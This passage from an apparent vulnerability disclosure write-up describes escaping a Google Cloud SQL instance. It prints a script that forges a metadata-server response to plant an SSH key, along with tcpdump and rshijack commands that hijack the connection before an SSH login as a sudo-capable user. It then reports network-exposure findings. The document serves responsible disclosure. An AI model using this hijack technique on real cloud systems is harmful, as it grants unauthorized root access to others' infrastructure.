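# fakeData.sh <ETAG> -- hedged sketch of a spoofed metadata response.
ETAG="$1"
PUBKEY="ssh-rsa AAAAB3Nza...placeholder... wouter"   # attacker-controlled public key (placeholder)

# Recursive metadata JSON carrying an ssh-keys attribute for user "wouter" (assumed layout).
BODY="{\"instance\":{\"attributes\":{\"ssh-keys\":\"wouter:${PUBKEY}\"}},\"project\":{\"attributes\":{}}}"

# Emit a complete raw HTTP response; rshijack writes this straight onto the connection.
printf 'HTTP/1.1 200 OK\r\n'
printf 'Metadata-Flavor: Google\r\n'
printf 'Content-Type: application/json\r\n'
printf 'ETag: %s\r\n' "$ETAG"
printf 'Content-Length: %s\r\n' "${#BODY}"
printf '\r\n'
printf '%s' "$BODY"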
To achieve the spoofing, we watched requests to the Metadata server with tcpdump (tcpdump -S -i eth0 'host 169.254.169.254 and port 80' &), waiting for a line that looked like this:
<TIME> IP <LOCAL_IP>.<PORT> > 169.254.169.254.80: Flags [P.], seq <NUM>:<TARGET_ACK>, ack <TARGET_SEQ>, win <NUM>, length <NUM>: HTTP: GET /computeMetadata/v1/?timeout_sec=<SECONDS>&last_etag=<ETAG>&alt=json&recursive=True&wait_for_change=True HTTP/1.1
As soon as we saw that value, we quickly ran rshijack with our fake Metadata response payload and ssh'd into the host:
fakeData.sh <ETAG> | rshijack -q eth0 169.254.169.254:80 <LOCAL_IP>:<PORT> <TARGET_SEQ> <TARGET_ACK>; ssh -i id_rsa -o StrictHostKeyChecking=no wouter@localhost
Most of the time, we were able to type fast enough to get a successful SSH login :).
Once we accomplished that, we had full access to the host VM (Being able to execute commands as root through sudo).
Impact & Conclusions
Once we escaped to the host VM, we were able to fully research the Cloud SQL instance.
It wasn’t as exciting as we expected, since the host did not have much beyond the absolutely necessary stuff to properly execute MySQL and communicate with the Cloud SQL API.
One of our interesting findings was the iptables rules: when you enable Private IP access (which cannot be disabled afterwards), access to the MySQL port is not only added for the IP addresses of the specified VPC network, but also for the full 10.0.0.0/8 IP range, which includes other Cloud SQL instances.
Therefore, if a customer ever enabled Private IP access to their instance, they could be targeted by an attacker-controlled Cloud SQL instance. This could go wrong very quickly if the customer solely relied on the instance being isolated from the external world, and didn’t protect it with a proper password.
Furthermore, the Google VRP team expressed concern that it might be possible to escalate IAM privileges using the Cloud SQL service account attached to the underlying Compute Engine instance.
0 notes